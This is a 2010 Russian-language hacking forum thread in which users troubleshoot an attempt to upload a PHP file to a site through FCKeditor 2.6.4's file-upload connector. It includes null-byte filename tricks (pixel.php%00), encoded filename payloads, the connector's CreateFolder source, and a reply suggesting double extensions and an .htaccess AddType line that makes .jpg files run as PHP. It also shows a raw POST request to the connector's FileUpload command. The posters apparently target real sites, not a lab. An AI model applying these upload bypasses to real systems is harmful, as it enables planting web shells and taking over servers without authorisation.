fckeditor 2.6.4 Прошу помочь

Discussion in 'Уязвимости' started by KosoyRoman, 12 Jan 2010.

  1. KosoyRoman

    KosoyRoman Banned

    Joined:
    14 Sep 2008
    Messages:
    51
    Likes Received:
    12
    Reputations:
    -5
    Ребят, вообщем запарился я конкретно, fckeditor не заливает не в какую (((

    uploadtest.html
    --------------------
    Current Folder:
    pixel.php%00

    возвращает
    Error on file upload. Error number: 102

    на локале пашет нормально со всеми версиями ((( папка уплоада не стандартная, но если Current Folder: оставить пустым то заливает нормально. Что посоветуете еще? может кто знает как обойти занозу?
     
  2. [Life]

    [Life] Banned

    Joined:
    7 Jan 2010
    Messages:
    79
    Likes Received:
    3
    Reputations:
    0
    может проблема в fckeditor?
     
  3. KosoyRoman

    KosoyRoman Banned

    Joined:
    14 Sep 2008
    Messages:
    51
    Likes Received:
    12
    Reputations:
    -5
    Да не, пробовал еще на одном сайте, таже беда

    Code:
    function CreateFolder( $resourceType, $currentFolder )
    {
    	if (!isset($_GET)) {
    		global $_GET;
    	}
    	$sErrorNumber	= '0' ;
    	$sErrorMsg		= '' ;
    
    	if ( isset( $_GET['NewFolderName'] ) )
    	{
    		$sNewFolderName = $_GET['NewFolderName'] ;
    		$sNewFolderName = SanitizeFolderName( $sNewFolderName ) ;
    
    		if ( strpos( $sNewFolderName, '..' ) !== FALSE )
    			$sErrorNumber = '102' ;		// Invalid folder name.
    		else
    		{
    			// Map the virtual path to the local server path of the current folder.
    			$sServerDir = ServerMapFolder( $resourceType, $currentFolder, 'CreateFolder' ) ;
    
    			if ( is_writable( $sServerDir ) )
    			{
    				$sServerDir .= $sNewFolderName ;
    
    				$sErrorMsg = CreateServerFolder( $sServerDir ) ;
    
    				switch ( $sErrorMsg )
    				{
    					case '' :
    						$sErrorNumber = '0' ;
    						break ;
    					case 'Invalid argument' :
    					case 'No such file or directory' :
    						$sErrorNumber = '102' ;		// Path too long.
    						break ;
    					default :
    						$sErrorNumber = '110' ;
    						break ;
    				}
    			}
    			else
    				$sErrorNumber = '103' ;
    		}
    	}
    	else
    		$sErrorNumber = '102' ;
    
    	// Create the "Error" node.
    	echo '<Error number="' . $sErrorNumber . '" originalDescription="' . ConvertToXmlAttribute( $sErrorMsg ) . '" />' ;
    }
    
    судя по функции хер поймешь в чем дело ((
     
    #3 KosoyRoman, 12 Jan 2010
    Last edited: 12 Jan 2010
  4. KosoyRoman

    KosoyRoman Banned

    Joined:
    14 Sep 2008
    Messages:
    51
    Likes Received:
    12
    Reputations:
    -5
    если так

    pixel.php%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C

    то пишет что всё загружено но не тут то было (((
     
  5. [Life]

    [Life] Banned

    Joined:
    7 Jan 2010
    Messages:
    79
    Likes Received:
    3
    Reputations:
    0
    sNewFolderName = $_GET['NewFolderName'] ;
    $sNewFolderName = SanitizeFolderName( $sNewFolderName ) ;

    if ( strpos( $sNewFolderName, '..' ) !== FALSE )
    $sErrorNumber = '102' ; // Invalid folder name.

    ты создавал дерикторию?
     
  6. KosoyRoman

    KosoyRoman Banned

    Joined:
    14 Sep 2008
    Messages:
    51
    Likes Received:
    12
    Reputations:
    -5
    [Life] дак вот я понять то и не могу ((( тоесть pixel.php%3C пишет что загружен, но файла нет, если так pixel.php%00 то отдает 102 ошибку, если пустым оставить то нормально заливает по сути с нулбайтом он должен создать файл а не папку

    Цитата с http://www.xakep.ru/magazine/xa/128/040/1.asp


    На локале всё работает на ура
     
    #6 KosoyRoman, 12 Jan 2010
    Last edited: 12 Jan 2010
  7. KosoyRoman

    KosoyRoman Banned

    Joined:
    14 Sep 2008
    Messages:
    51
    Likes Received:
    12
    Reputations:
    -5
    Понял в чем дело ((( в magic_quotes_gpc но как обойти его?
     
  8. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,055
    Likes Received:
    615
    Reputations:
    690
    Варианты расширений testl.php%00.gif testl.php.ggif
    test.gif.php попробовал ?
    Еще попробуй залить файл .htaccess чтобы расширение jpg исполнялись как php
    вроде так AddType application/x-httpd-php .jpg .txt
    еще вариант:
    Code:
    POST /fckeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP/1.0
    Accept: */*
    Content-Type: multipart/form-data; 
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
    Host: xxxxxxxx.com
    Content-Length: 234
    Connection: Close
    Pragma: no-cache
    Content-Disposition: form-data; name="NewFile"; filename="test.txt"
    Content-Type: text/plain
    
    testing upload file
    
    но php никак =\ пока хз сам ищу варианты....
     
    _________________________
    #8 shell_c0de, 23 Feb 2010
    Last edited: 23 Feb 2010
Loading...